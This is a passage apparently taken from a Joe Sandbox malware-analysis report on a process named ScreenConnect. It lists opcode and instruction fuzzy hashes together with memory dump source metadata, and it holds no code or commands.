                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c5868d6cac8c6f0cbb970409fa042f1eb6bf35e3a987365b4784394f32ba0c9a
                                                                                                                                                                                                                                                  • Instruction ID: 118c3efe064df8ad44c87456fe78979a80f1ab5124db4cfb985e571384d9e74d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5868d6cac8c6f0cbb970409fa042f1eb6bf35e3a987365b4784394f32ba0c9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0E5312042485FC7049B79EC01AAE7BA5EBC612074CC9AAD545CB756DA65E80787D4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2a927aa16144ff0343832906756de8b0ab15b5e690bec706fbab1d0eabcfd256
                                                                                                                                                                                                                                                  • Instruction ID: 92a44398c57e6a2a28b55ec5bd055eff31695adeb4de8a26fa78308b45c2211a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a927aa16144ff0343832906756de8b0ab15b5e690bec706fbab1d0eabcfd256
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A012B7250C2944FC7019F38DC512A93BA5DF97110B4D44EAD485CF797EA19D80BC7A5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 44347e90523f8d2be49ac0912ab8ec7efb5e09ca35bd2730a838ea8e07fd45c1
                                                                                                                                                                                                                                                  • Instruction ID: e38231263330ed3b311d44ba8dcbcbd112ce494a1c92b69cfb515cd62bb8a297
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44347e90523f8d2be49ac0912ab8ec7efb5e09ca35bd2730a838ea8e07fd45c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0026935A107198FCB15DF68C840A9AB7F2FF89300F118699D549AB361EB71EE85CF81
Memory Dump Source
• Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77ce366614e60ab115a0102905bd0efed04771ce44cfcf3753d6a53951e44e3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9341A571E002099FDB19DFA9C980AEEBBB5EF89700F158169E501B7354DB70AD46CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 87dae86f2acecd665fc8b1412a0b5ec23d046334462c9a2735d7c4d1be7f78d1
                                                                                                                                                                                                                                                  • Instruction ID: 677c04b5edd09ef7dbd2e13afc72a62f3e39b99e0cec2d5324a3fbe704c2e914
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87dae86f2acecd665fc8b1412a0b5ec23d046334462c9a2735d7c4d1be7f78d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2841A1317206018FDB18DF68D854AADBBF2FF88214B1145A8E416EB3A4DF30ED09CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3259f90d6daf22a8fb33761903585210bbdd2afe6eecaa3b9a8ee0fc2e9f05db
                                                                                                                                                                                                                                                  • Instruction ID: e306047eead6cae498e696e1f6e4c9005497b865791a30db39ec8782260b15f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3259f90d6daf22a8fb33761903585210bbdd2afe6eecaa3b9a8ee0fc2e9f05db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5319231B201058FEB189FA9C4546AEFBF6EF89355F1184AAE506E7358DF31DD048B90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 78dfe0173f3c554fbedf420e129943e34bd6572cee18f3c6c315752ac9bb1618
                                                                                                                                                                                                                                                  • Instruction ID: 455c9e48f1a2db99827b46bb2826221fc63922b75316e46d12507cd9149eab08
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78dfe0173f3c554fbedf420e129943e34bd6572cee18f3c6c315752ac9bb1618
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19417F317206118FDB18DF69D854A6EBBF6FF88614B1545A8E406E73A4DF30EC04CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6baeb6096d6a0f106f62db97bf50cc1b59c72d9102d2bb078a5930891be2f0af
                                                                                                                                                                                                                                                  • Instruction ID: e0e7e7daf64d2135278e1fa23cb5ce3043bcefaea2fb52e9830286c3416fd0ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6baeb6096d6a0f106f62db97bf50cc1b59c72d9102d2bb078a5930891be2f0af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB31B070600B018FCB34CF69C84865ABBF1EF86310F554B9DD0969B6A9D770E94ACF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 552ebf43a8d68486bdb2728e01135cb11c5d4f0960c3f90c33a89a053d1c107d
                                                                                                                                                                                                                                                  • Instruction ID: 14ee428a99528c4faed32eb08089b245e085f6bcb2b1020eefdaff60323e9c71
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 552ebf43a8d68486bdb2728e01135cb11c5d4f0960c3f90c33a89a053d1c107d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D317CB2D002099FCB24DFA9D444ADEBFF4EF88320F14846AD419A7350DB78A945CFA4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a766087de7c2d65c97ab85c77bb7943676de21f78edec7cc26e1ecf7985c9068
                                                                                                                                                                                                                                                  • Instruction ID: 54391f016f3436605e2559b4e4ffc2b0fc60804a8aef90bf3388de0fe1076a41
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a766087de7c2d65c97ab85c77bb7943676de21f78edec7cc26e1ecf7985c9068
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA313A306007058FD734DF2AC844A6ABBF1EF89314B554A6CE496DB7A9D770E946CF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5896546985b688c665bc33509ce7513cc2b90ec664ca8f7f22adbbfb275f47bc
                                                                                                                                                                                                                                                  • Instruction ID: 7399ba992a9a74a2feaf55ee0e080cf86839a033a7afc600b50355383784a187
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5896546985b688c665bc33509ce7513cc2b90ec664ca8f7f22adbbfb275f47bc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3313970600B058FD734DF69C84865ABBF1EF89310B514B68D0969B6A9D770E94ACF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3533841b06ad140a86f46e31393b86950c8a3a37004e72d4e76d67677a412abd
                                                                                                                                                                                                                                                  • Instruction ID: 52dfe926fa3ee2a71718ba654f20143df29c4d2a02c04fcad7a46dcb8e07df3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3533841b06ad140a86f46e31393b86950c8a3a37004e72d4e76d67677a412abd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5315675A00205DFCB04DFB4DD489AEBBF5FF4922070485AAD906D7355EB30AD10CB61
Memory Dump Source
• Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd0e51377819e54ceb082b4fe61f6f4c1c963938a83b30a456ae800332ece0a5
                                                                                                                                                                                                                                                  • Instruction ID: 3d1f427ef9bb79c091f781661e7ca1751cbaad870516daaa82c5d351f726569e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd0e51377819e54ceb082b4fe61f6f4c1c963938a83b30a456ae800332ece0a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121EB34600A058FD734CF29D844596BBB1FF84320B148B6DD592976A5DB31E95ACF90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f64bc5f89f5545e422f652291c77e8e50bc7e8f1d0ff1f2d6e83f00df3f98fda
                                                                                                                                                                                                                                                  • Instruction ID: c3fea1cc18d8358436d015d9f5384d2e9df522eb131905f7067f4b8860f34cce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f64bc5f89f5545e422f652291c77e8e50bc7e8f1d0ff1f2d6e83f00df3f98fda
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62210E70A017418FD738DF79D84866ABBF1FF48310B618A6CD86687658D770F901CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cef3c8ee220ccc7e0672ca52bb66ffb55eb9385ffe2dbce295e64c136919b481
                                                                                                                                                                                                                                                  • Instruction ID: e4b4bd417790f72d46904544f88a45b03dcdb0ac0e82129bb1d5f296420b6704
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cef3c8ee220ccc7e0672ca52bb66ffb55eb9385ffe2dbce295e64c136919b481
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14213632D10B0A9DCB51EFB8D8405EAF7B4EF99310F11C62AE559A7111FB70A2958B80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 82c7a7e1af1687a126733614196dd7af24f381df82e9e4a9e84ca8227854e535
                                                                                                                                                                                                                                                  • Instruction ID: 7141766db5a2aa2376b4e1f3c76d1a8b548e04a847b09468f834e915fee7cafe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c7a7e1af1687a126733614196dd7af24f381df82e9e4a9e84ca8227854e535
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 991190317002055FE709EB68D94066EB7A7FFC4210F158929E516AB394DF70AD05C7E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3ddb825c8ba1346faceb694c1bec4e905ecfdf2e535ed7d7fcad8fa3d594a85f
                                                                                                                                                                                                                                                  • Instruction ID: 7fdb6263b5073207c342fd3b38664ec9f5f1a9ed520aa0e004c8f6f147da6706
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ddb825c8ba1346faceb694c1bec4e905ecfdf2e535ed7d7fcad8fa3d594a85f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 962134B6C00259DFCB14CF9AC844ADEBBF5FB88320F15846AE918A7210C339A555DFA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8edcb56b88238549d1f92de21caea79d346452327eb778f58cd947dc6d338f22
                                                                                                                                                                                                                                                  • Instruction ID: a544a83537cacb4dd1634e3a0a9b07c793b7f245f321cb84f832039fa8a94619
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8edcb56b88238549d1f92de21caea79d346452327eb778f58cd947dc6d338f22
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1117F31B1020A9FCB05DF68DD849AEBBF5FF88210B508529E519AB354DB70FC05CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9d07b33ef215752474c4e8196520ddec96f22f76fc38f35f1eb7c5ee7bd3c370
                                                                                                                                                                                                                                                  • Instruction ID: 5fdc9d56f0b70e1c0bb5f4bba2e578550341f96be173ddb8740379fc4481d6e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d07b33ef215752474c4e8196520ddec96f22f76fc38f35f1eb7c5ee7bd3c370
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511BF31E001099FCB04DFA8D559AAEBBF6FF44304F1180A9E509DB361EA74DD41CB81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1739d903e031f17ff4f61c128216c8bedecb53b6bf0bc42ac1628f0a462f69f2
                                                                                                                                                                                                                                                  • Instruction ID: 58dc7b34ba3976aafcf19dbafd6200dff91df938519bf5301c5e6f0b64cd685e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1739d903e031f17ff4f61c128216c8bedecb53b6bf0bc42ac1628f0a462f69f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9101F977D0E3908FC34A6B39581A1D13FA0E96715238B06D7E185CF16FD6158883E711
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 59ec0f96bb7c5a92fe9496cbe2a60e36dc1ee5525679c17c256faba0b8d406db
                                                                                                                                                                                                                                                  • Instruction ID: 9427b611bf2b6af04479949f6ac94ccc411cadf798a86a6ab46519639018ee4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ec0f96bb7c5a92fe9496cbe2a60e36dc1ee5525679c17c256faba0b8d406db
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F110035A0010A9FCF01DFA8D9409DEBBF5FF49354B108569E905BB265D771AA0ACB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 323825b3ace8811d647760d9efd84237f3468dc04733c7253d4ff43ac50e4c1c
                                                                                                                                                                                                                                                  • Instruction ID: c61516715bc2419435c1c5abfc261933ece0eb594eb73b29d049ec5e9035d82d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 323825b3ace8811d647760d9efd84237f3468dc04733c7253d4ff43ac50e4c1c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC012632B112619B8B098B6DA84446BB7E9FBC42603154ABBD105CB305DBB1EC068BD0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2e5cd1d73fc1a802b0e8f607d3494c1d1dae71bbf1a95018c922ef5dba114860
                                                                                                                                                                                                                                                  • Instruction ID: 0b067a492eef3393b038ba1bd55ebba7fef268052317beaaff0407053acc571d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e5cd1d73fc1a802b0e8f607d3494c1d1dae71bbf1a95018c922ef5dba114860
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65018032E1011ADFDB09DFA9D8448CDBBF2FF89314F4984AAE405BB254DB356946CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1facc1a5ef41697ca3a8b3792f820658c9e4cbe430d07c827ae811f3f4773067
                                                                                                                                                                                                                                                  • Instruction ID: 440f4c56d67f5da7880559887101b6ca37df96cc0b4e10166ba86fbfa72c4acf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1facc1a5ef41697ca3a8b3792f820658c9e4cbe430d07c827ae811f3f4773067
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A01176240E3C09ED7178B658894A52BFB4AF42224F1981DBD9898F2A7C2699849C772
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 79fe3e3cc3aed09f27b17ad738b8e40b8e80025b377df7f92cb214fb4ee9adb2
                                                                                                                                                                                                                                                  • Instruction ID: 72d026a14e205a65f620b35f7d3fbce36b5a7e1b7f7e15e7847921af4ed2a4ba
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79fe3e3cc3aed09f27b17ad738b8e40b8e80025b377df7f92cb214fb4ee9adb2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F7714083009AE716CEE9CD84B67BF98EF413A4F08C629ED4E4A2D6C379D842C6B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d4c461bbccb17ccee6f8625e5430ed73690ba3588e71fdb1dd8e1adb58fe1185
                                                                                                                                                                                                                                                  • Instruction ID: 7142697ca4cdc26db5573f39f959059456d950a9f3e73ec17586e546002354c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c461bbccb17ccee6f8625e5430ed73690ba3588e71fdb1dd8e1adb58fe1185
